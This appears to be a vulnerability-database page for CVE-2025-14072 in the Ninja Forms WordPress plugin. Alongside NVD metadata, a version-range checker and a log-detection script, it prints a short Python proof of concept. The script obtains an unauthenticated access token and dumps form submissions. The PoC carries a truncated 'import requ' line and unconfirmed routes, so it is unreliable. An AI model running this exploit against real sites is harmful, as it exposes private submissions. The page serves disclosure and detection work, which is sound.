Security Vulnerability Report
CVE-2025-14072 CVSS 5.3 MEDIUM

CVE-2025-14072

Published: 2026-01-02 06:15:54
Last Modified: 2026-01-09 13:58:48

Description

The Ninja Forms WordPress plugin before 3.13.3 allows unauthenticated attackers to generate valid access tokens via the REST API which can then be used to read form submissions.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* - VULNERABLE
Ninja Forms < 3.13.3
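The NVD configuration above expresses the affected range only through versionEndExcluding = 3.13.3 (the CPE version field is a wildcard). The following added example, not part of the NVD record or of the Ninja Forms project, evaluates an installed plugin version against that configuration block. It compares versions numerically, which matters here: a plain string comparison would rank "3.13.10" below "3.13.3" and misreport a patched install as vulnerable. It handles the four NVD range keys and assumes the configuration uses OR nodes only, which is what this record contains.

```python
"""Match an installed Ninja Forms version against the NVD configuration
for CVE-2025-14072.  Added example; not from the NVD record or the plugin."""
import json

# Copied from the raw NVD JSON on this page (matchCriteriaId omitted).
NVD_CONFIGURATIONS = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [
  {"vulnerable": true,
   "criteria": "cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*",
   "versionEndExcluding": "3.13.3"}]}]}]
""")


def parse_version(v):
    """'3.13.3' -> (3, 13, 3).  Non-numeric suffixes such as '3.13.3-rc1'
    keep their leading digits; a component with no digits counts as 0."""
    parts = []
    for piece in v.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def compare_versions(a, b):
    """Return -1, 0 or 1 for a < b, a == b, a > b, padding short tuples
    with zeros so that 3.13 and 3.13.0 compare equal."""
    pa, pb = parse_version(a), parse_version(b)
    n = max(len(pa), len(pb))
    pa += (0,) * (n - len(pa))
    pb += (0,) * (n - len(pb))
    return (pa > pb) - (pa < pb)


def in_nvd_range(installed, match):
    """Apply whichever of the four NVD range keys the cpeMatch carries."""
    bounds = (
        ("versionStartIncluding", lambda c: c >= 0),
        ("versionStartExcluding", lambda c: c > 0),
        ("versionEndIncluding", lambda c: c <= 0),
        ("versionEndExcluding", lambda c: c < 0),
    )
    for key, ok in bounds:
        if key in match and not ok(compare_versions(installed, match[key])):
            return False
    return True


def cpe_fields(criteria):
    """vendor, product and version fields of a CPE 2.3 formatted string."""
    f = criteria.split(":")
    return f[3], f[4], f[5]


def is_vulnerable(installed, vendor="ninjaforms", product="ninja_forms",
                  configurations=NVD_CONFIGURATIONS):
    """True if any vulnerable cpeMatch for vendor/product covers `installed`.
    Simplification (assumption): nodes are treated as OR; AND nodes that
    combine several products are not modelled."""
    for config in configurations:
        for node in config["nodes"]:
            for m in node.get("cpeMatch", []):
                v, p, ver = cpe_fields(m["criteria"])
                if (v, p) != (vendor, product) or not m.get("vulnerable"):
                    continue
                # An explicit CPE version must match exactly; '*' defers
                # entirely to the range keys.
                if ver != "*" and compare_versions(installed, ver) != 0:
                    continue
                if in_nvd_range(installed, m):
                    return True
    return False


if __name__ == "__main__":
    for candidate in ("3.13.2", "3.13.3", "3.13.10", "3.9.0"):
        print(candidate, "vulnerable" if is_vulnerable(candidate) else "patched")
```

The installed version can be read from the `Version:` header of ninja-forms.php in the plugin directory or from the WordPress admin plugins page; feed that string to `is_vulnerable`.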

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json

import requ

target = 'http://target-wordpress-site.com'

# Step 1: Obtain an access token via the REST API.
# NOTE: the route, the 'form_id' parameter and the 'token' response field
# are as given in this PoC; the WPScan advisory referenced on this page does
# not publish them, so verify them against the vulnerable plugin version.
token_url = f'{target}/wp-json/ninja-forms/v1/access-token'
payload = {'form_id': 1}
response = requests.post(token_url, json=payload)
response.raise_for_status()
token_data = response.json()
access_token = token_data.get('token')
if not access_token:
    raise SystemExit(f'No token in response: {token_data}')

# Step 2: Retrieve form submissions using the token as a bearer credential.
submissions_url = f'{target}/wp-json/ninja-forms/v1/submissions'
headers = {'Authorization': f'Bearer {access_token}'}
response = requests.get(submissions_url, headers=headers)
response.raise_for_status()
print('Exfiltrated form submissions:')
print(json.dumps(response.json(), indent=2))
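The defender's counterpart to the two-step PoC is a log search for the same sequence: a successful unauthenticated token request followed shortly by a successful submissions read from the same client. The following added example (not from the original page, the advisory, or the plugin) runs that check over constructed Apache combined-format access log lines. The two route paths are taken from the PoC above and are an assumption, not confirmed by the referenced advisory; adjust them to whatever routes the vulnerable version actually exposes. Access logs cannot show whether a request carried a WordPress session, so the sequence itself, rather than any single request, is the signal.

```python
"""Flag token-issue-then-submissions-read sequences in web server logs.
Added example; not part of the page, the advisory, or Ninja Forms."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: routes as used by the PoC on this page, unconfirmed elsewhere.
TOKEN_ROUTE = "/wp-json/ninja-forms/v1/access-token"
SUBMISSIONS_ROUTE = "/wp-json/ninja-forms/v1/submissions"

# Apache/nginx combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines: one attack sequence, one unrelated REST call,
# and one submissions request that was refused.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jan/2026:06:20:01 +0000] "POST /wp-json/ninja-forms/v1/access-token HTTP/1.1" 200 87 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [02/Jan/2026:06:20:02 +0000] "GET /wp-json/ninja-forms/v1/submissions?form_id=1 HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"',
    '198.51.100.4 - - [02/Jan/2026:06:25:10 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [02/Jan/2026:07:00:00 +0000] "GET /wp-json/ninja-forms/v1/submissions HTTP/1.1" 401 42 "-" "curl/8.4.0"',
]


def parse_line(line):
    """Return a dict of the fields the detection needs, or None if the line
    is not in combined format.  The query string is stripped from the path."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def find_token_then_read(lines, window=timedelta(minutes=10)):
    """Alert when an IP that obtained a token (POST, 2xx) reads submissions
    (GET, 2xx) within `window`.  Events are sorted first so out-of-order
    log rotation does not hide a sequence."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    events.sort(key=lambda e: e["ts"])
    issued = defaultdict(list)   # ip -> timestamps of successful token requests
    alerts = []
    for e in events:
        ok = 200 <= e["status"] < 300
        if e["method"] == "POST" and e["path"] == TOKEN_ROUTE and ok:
            issued[e["ip"]].append(e["ts"])
        elif e["method"] == "GET" and e["path"] == SUBMISSIONS_ROUTE and ok:
            recent = [t for t in issued[e["ip"]]
                      if timedelta(0) <= e["ts"] - t <= window]
            if recent:
                alerts.append({"ip": e["ip"], "token_at": max(recent),
                               "read_at": e["ts"]})
    return alerts


if __name__ == "__main__":
    for a in find_token_then_read(SAMPLE_LOG):
        print(f"{a['ip']}: token at {a['token_at']:%H:%M:%S}, "
              f"submissions read at {a['read_at']:%H:%M:%S}")
```

On a patched site the token request should no longer succeed for an anonymous client, so any 2xx on the token route after upgrading to 3.13.3 deserves a second look on its own.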

References

https://wpscan.com/vulnerability/4b19a333-eb19-4903-aa96-1fe871dd0f9f/ (WPScan advisory; tagged Third Party Advisory, Exploit)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14072", "sourceIdentifier": "[email protected]", "published": "2026-01-02T06:15:53.627", "lastModified": "2026-01-09T13:58:47.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ninja Forms WordPress plugin before 3.13.3 allows unauthenticated attackers to generate valid access tokens via the REST API which can then be used to read form submissions."}, {"lang": "es", "value": "El plugin de WordPress Ninja Forms anterior a la versión 3.13.3 permite a atacantes no autenticados generar tokens de acceso válidos a través de la API REST, que luego pueden ser utilizados para leer envíos de formularios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.13.3", "matchCriteriaId": "E4B2BDF6-7FC1-4D62-9FDF-ABD8788530A8"}]}]}], "references": [{"url": "https://wpscan.com/vulnerability/4b19a333-eb19-4903-aa96-1fe871dd0f9f/", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}